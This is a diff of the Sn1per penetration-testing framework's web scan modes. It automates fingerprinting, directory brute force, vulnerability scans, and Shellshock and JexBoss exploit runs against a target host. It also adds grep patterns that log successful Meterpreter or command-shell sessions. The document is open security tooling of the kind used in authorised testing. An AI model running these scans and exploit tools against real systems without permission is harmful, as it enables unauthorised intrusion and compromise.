echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
webtech -u https://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https-port$PORT.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
if [ "$WAFWOOF" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wafw00f https://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-https-port$PORT.txt 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WHATWEB" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
whatweb -a 3 https://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WIG" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-https-$PORT
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https-$PORT > $LOOT_DIR/web/wig-$TARGET-https-$PORT.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS https://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
webtech -u https://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https-port$PORT.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
if [ "$SSL" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
sslscan --no-failed $TARGET:$PORT | tee $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw > $LOOT_DIR/web/sslscan-$TARGET-$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
|
|
@ -146,12 +148,12 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
fi
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:$PORT
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:$PORT
|
||||
fi
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}\"$RESET"
|
||||
fi
|
||||
|
|
@ -159,29 +161,29 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo ""
|
||||
fi
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln*,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u https://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
|
||||
|
|
@ -199,9 +201,9 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
|
|
@ -211,9 +213,9 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -222,9 +224,9 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -247,45 +249,45 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
fi
|
||||
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
clusterd --ssl -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cmsmap https://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
cmsmap https://$TARGET:$PORT/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
|
||||
fi
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt
|
||||
fi
|
||||
if [ "$SHOCKER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null
|
||||
|
|
@ -299,11 +301,24 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
fi
|
||||
source modes/osint_stage_2.sh
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-webporthttps.txt $LOOT_DIR/scans/finished-$TARGET-webporthttps.txt 2> /dev/null
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [ ${#VULNERABLE_METASPLOIT} -ge 5 ]; then
|
||||
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
|
||||
if [ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]; then
|
||||
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [ ${#SHELLED} -ge 5 ]; then
|
||||
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -50,9 +50,9 @@ if [ "$MODE" = "webscan" ]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
|
||||
echo ""
|
||||
|
|
@ -70,14 +70,14 @@ if [ "$MODE" = "webscan" ]; then
|
|||
done
|
||||
echo "[+] VULNERABILITIES: "
|
||||
echo "----------------------------------------------------------------"
|
||||
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep -o -P "name.{1,100}" | cut -d\" -f3 | sort -u | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
|
||||
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep -o -P "name.{1,100}" | cut -d\" -f3 | sort -u | grep -Ev 'caption|evidence' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
|
||||
done
|
||||
echo "[-] Done!"
|
||||
fi
|
||||
if [ "$ARACHNI_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
mkdir -p $LOOT_DIR/web/http-$TARGET/
|
||||
mkdir -p $LOOT_DIR/web/https-$TARGET/
|
||||
arachni --report-save-path=$LOOT_DIR/web/http-$TARGET/ --output-only-positives http://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
|
|
@ -103,4 +103,4 @@ if [ "$MODE" = "webscan" ]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
157
sniper
157
sniper
|
|
@ -3,7 +3,7 @@
|
|||
# + -- --=[https://xerosecurity.com
|
||||
#
|
||||
|
||||
VER="7.2"
|
||||
VER="7.3"
|
||||
INSTALL_DIR="/usr/share/sniper"
|
||||
LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
|
||||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
|
|
@ -14,79 +14,71 @@ service postgresql start
|
|||
# LOAD SNIPER CONFIGURATION FILE
|
||||
if [ -f ~/.sniper.conf ]; then
|
||||
source ~/.sniper.conf
|
||||
echo -e "$OKBLUE[*] Loaded configuration file from ~/.sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Loaded configuration file from ~/.sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
else
|
||||
